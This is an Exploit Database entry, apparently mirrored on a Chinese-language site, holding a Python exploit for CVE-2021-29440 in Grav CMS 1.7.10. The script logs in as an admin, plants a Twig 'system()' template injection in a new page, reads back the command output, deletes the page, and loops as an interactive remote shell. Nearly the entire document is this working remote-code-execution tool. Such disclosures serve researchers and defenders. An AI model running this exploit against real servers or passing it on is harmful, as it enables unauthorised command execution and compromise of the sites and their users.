Grav CMS 1.7.10 – Server-Side Template Injection (SSTI) (Authenticated)

• Exploit Database
• 107 阅读

• 作者： enox
  日期： 2021-06-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49961/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82

  # Title: Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated) # Author: enox # Date: 06-06-2021 # Vendor: https://getgrav.org/ # Software Link: https://getgrav.org/download/core/grav-admin/1.7.10 # Vulnerable Version(s): Grav CMS 1.7.10 # CVE: CVE-2021-29440 # Credits: https://blog.sonarsource.com/grav-cms-code-execution-vulnerabilities # NOTES: You need a user who has access to /admin dashboard with page creation privileges.   #!/usr/bin/python   import requests from bs4 import BeautifulSoup import random import string     username = &apos;username&apos; password = &apos;password&apos; url = &apos;http://grav.local&apos;     session = requests.Session()   # Autheticating ## Getting login-nonce def login(url,username,password): r = session.get(url + "/admin") soup = BeautifulSoup(r.text, features="lxml") nonce = str(soup.findAll(&apos;input&apos;)[2]) nonce = nonce[47:79]   ## Logging in payload =f&apos;data%5Busername%5D={username}&data%5Bpassword%5D={password}&task=login&login-nonce={nonce}&apos; headers = {&apos;Content-Type&apos;: &apos;application/x-www-form-urlencoded&apos;} r = session.post(url+"/admin",data=payload,headers=headers)     # Creating Page for RCE   def rce(url,cmd): ## Getting form nonce and unique form id project_name = &apos;&apos;.join(random.choices(string.ascii_uppercase + string.digits, k = 8)) r = session.get(url+f"/admin/pages/{project_name}/:add") soup = BeautifulSoup(r.text, features="lxml") nonce = str(soup.findAll(&apos;input&apos;)[72]) form_id = str(soup.findAll(&apos;input&apos;)[71]) form_id = form_id[54:86] nonce = nonce[46:78]   ## Creating Page headers = {&apos;Content-Type&apos;: &apos;application/x-www-form-urlencoded&apos;} payload = f&apos;task=save&data%5Bheader%5D%5Btitle%5D={project_name}&data%5Bcontent%5D=%7B%7B+system%28%27{cmd}%27%29+%7D%7D&data%5Bfolder%5D={project_name}&data%5Broute%5D=&data%5Bname%5D=default&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&toggleable_data%5Bheader%5D%5Bprocess%5D=on&data%5Bheader%5D%5Bprocess%5D%5Btwig%5D=1&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={form_id}&form-nonce={nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&data%5Bheader%5D%5Bprocess%5D%5Bmarkdown%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0&apos; r = session.post(url+f"/admin/pages/{project_name}/:add",data=payload,headers=headers)   ## Getting command output r = session.get(url+f"/{project_name.lower()}") if &apos;SyntaxError&apos; in r.text: print("[-] Command error") else: a = r.text.split(&apos;<section id="body-wrapper" class="section">&apos;) b = a[1].split(&apos;</section>&apos;) print(b[0][58:])     # Cleaning up ## Getting admin-nonce r = session.get(url + "/admin/pages") soup = BeautifulSoup(r.text, features="lxml") nonce = str(soup.findAll(&apos;input&apos;)[32]) nonce = nonce[47:79]   ## Deleting Page r = session.get(url+f"/admin/pages/{project_name.lower()}/task:delete/admin-nonce:{nonce}")   login(url,username,password)   while True: cmd = input("$ ") rce(url,cmd)